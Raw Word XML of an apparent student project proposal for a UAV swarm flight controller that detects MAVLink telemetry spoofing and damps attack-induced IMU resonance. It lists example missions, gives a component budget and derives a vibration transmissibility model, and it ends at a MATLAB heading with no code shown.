    <w:p w14:paraId="7CFE4F14" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>A FAULT TOLERANT CYBER PHYSICAL FLIGHT CONTROLLER DETECTING MAVLINK TELEMENTRY ATTACKS AND MITIGATING HARMONIC REASONANCE IN UAV SWARMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432CBBE9" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Introductions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631A70C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Unmanned aerial vehicles UAV swarms depend on MAVLINK protocol for telemetry and ground-based communication things. Every airspace vehicle uses Mav link but it doesn’t have cryptographic authentication this exposes them to cyber-attacks and telemetry spoofing by hackers and the air vehicle because useless for air travel and good navigation. So, an attacker can send high frequency motor commands so that the drones propulsion systems vibrate more. These high vibrations align with the inertial measurement unit IMU of the materials or support the entire systems looses stability and starts shaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E24330" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>This project address dual layer of security to make UAV swarms stand against cybersecurity and physical attacks. The cyber security layer has advanced algorithms that detect and monitor Mav link traffic and the physical layer aims to protect against abnormal resonances so that the drones remain in good orientation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58385B62" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>I am going to use mechanical modelling and mathematical simulation and calculate transmission requirements and find mass, stiffness, and damping coefficients to make sure that the physical structure is safe from induced higher frequences from an attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05169B5E" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>The main goal is to create a swarm of drones that are hard for software attacks to attacker telemetry and ensure mechanical structure remains safe allowing the sensors on UAV to store and process data under active cyber physical attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5313AE" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4126CC55" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879B5B8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deep offshore wind farm maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D0958" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The mission: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C42F9" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Autonomously swarm coordinated inspection of wind turbines that are in seas such as North Sea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2014F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000" w:rsidP="002C1552">
      <w:pPr>
        <w:pStyle w:val="HeaderandFooter"/>
      </w:pPr>
      <w:r>
        <w:t>Why use drone:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB8E5AD" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Oceans have violent winds that destroy normal drones my controller dampens the vibrations allowing the swarm drones to fly and inspect blades for cracks and damages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1650091B" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177A1093" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nuclear or chemical disaster mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DAA0FB" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mission:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5EA543" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Entering hazardous zones such as chemical plant disasters or nuclear leak to map out the size of their danger zone for human rescue operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6BA48" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Why use drones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275525D0" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extreme heat and radiation usually fry normal drones motor and GPS my fault tolerant system ensures swarm operation built with resilient materials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898653F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5970DCB4" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Autonomous cargo transport and smart city logistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CFD5C8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mission:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549452E" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Delivering time sensitive medical supplies, organs such as a live heart, blood bags for hospitals in a crowded city, the drones simply fly in coordinated way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFC24A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Why use drones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD5CC9" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Drone blocks Mav link telemetry attack ensuring speed and 100 percent secretive safety of delivery of cargo and healthy things</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD64EF" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2875FD77" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Smart agriculture and crop health mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51899380" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC641A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Scanning massive European farmlands to identify crop diseases, wild life movements and the thieves thereof, water waste or pest infections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C901AC" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Why use drones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52522795" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A swarm of drones can scan thousands of hectares in small amount of time and working a s a swarm ensures redundance suppose one fails </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C561F6" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="134BE440" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Budget </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61802278" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> Component Category | Description / Specifications | Estimated Cost (USD) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> Airframe &amp; Mechanical | Custom carbon fibre composite frame with 3D-printed vibration isolation  $80 – $150</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> Propulsion System | Brushless motors (×4), Electronic Speed Controllers (ESCs), and  $120 – $250 </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">propellers </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> Flight Control &amp; Sensors | Pixhawk or compatible flight controller, IMU, and GPS </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">module  $150 – $300 </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> Power System | High-discharge LiPo batteries (4S/6S) and intelligent battery charger  $60 – $120 </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Telemetry &amp; Communications | Companion computer or ESP32/Wi-Fi modules for MAV Link telemetry relay  $40 – $100 </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Total Single Prototype Cost | Fully integrated custom R&amp;D airframe | $450 – $920 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB750C8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A2AD73" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4CF60" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mathematical modelling and physical anaylsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F44B00" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>This is the second step looks at the equations of motion and computational vibrations required during the inertial measurement unit IMU during a Mav link telemetry attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE1085" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Harmonic base motion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FCB023" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>M= mass of IMU and suspended mounting plate kg</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FDDEE5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>K= equivalent stiffness of elastomeric mounts (N/m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CC92A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Y(t)= Absolute harmonic displacement displacement of the drone frame (m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E362A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>X(t)= absolute harmonic displacement of IMU payload (m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A909DEE" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Y(t)= Ysin(wt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7907A7E5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>IMU mass displacement x(t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C106BC" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Mass-spring-damper parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C2E97" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>IMU payload (mass)  m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F043DF5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Damper stiffness components k/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C9B773" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Damping components c/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F6947" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>We represent the mounting system as a single-degree-of-freedom SDOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6B2F8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRPr="002C1552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1552">
        <w:t>Newtons second law</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC9667" w14:textId="77777777" w:rsidR="005D7421" w:rsidRPr="002C1552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1552">
        <w:t>m*x'' + c*(x' - y') + k*(x - y) = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B2E41B" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>for the relative motion between IMU and vibrating chasis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E5AEDB" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>m*z'' + c*z' + k*z = -m*y''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471F99A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>derivation of transmissibility (Tr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73814DF4" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>y(t)=Ysin(wt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42986EA5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>y''(t) = -ω^2 * Y * sin(ωt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD98415" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>The governing differential equation becomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD1927" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>m*z'' + c*z' + k*z = m*ω^2*Y*sin(ωt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAAF35D" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>the steady state for complete displacement x(t)= Xsin(wt-phi) gives the ration of output force/amplitude transmitted to the IMU relative to the input base amplitude and this is defined as transmissibility (Tr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F471CE9" w14:textId="77777777" w:rsidR="005D7421" w:rsidRPr="002C1552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1552">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tr = X/Y = sqrt[ (1 + (2*</w:t>
      </w:r>
      <w:r>
        <w:t>ζ</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1552">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>*r)^2) / ((1 - r^2)^2 + (2*</w:t>
      </w:r>
      <w:r>
        <w:t>ζ</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1552">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>*r)^2) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D0696" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Where the dimensionless parameters are defined as:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:t>ωn = sqrt(k/m)  :  Undamped natural frequency (rad/s)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:t>r = ω / ωn  :  Frequency ratio</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:t>ζ = c / (2*sqrt(k*m))  :  Damping ratio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48629091" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>T(r)&lt;1 to attenuate vibrations reaching IMU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850EFFC" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>This yiled to the equation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241339D7" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>r&gt;sqrt (2) implies omega&gt; sqrt(2) omega sub n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109EB5CA" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>this inequality shows that the isolation only occurs when the excitation frequency forced by the motor attack is greater than sqrt (2) times the natural frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B0C134" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF0B1EC" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MMATLAB SCRIPT / PARAMETRIC Transmissibility analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E66FE5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MATLAB code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F70C5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41760178" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
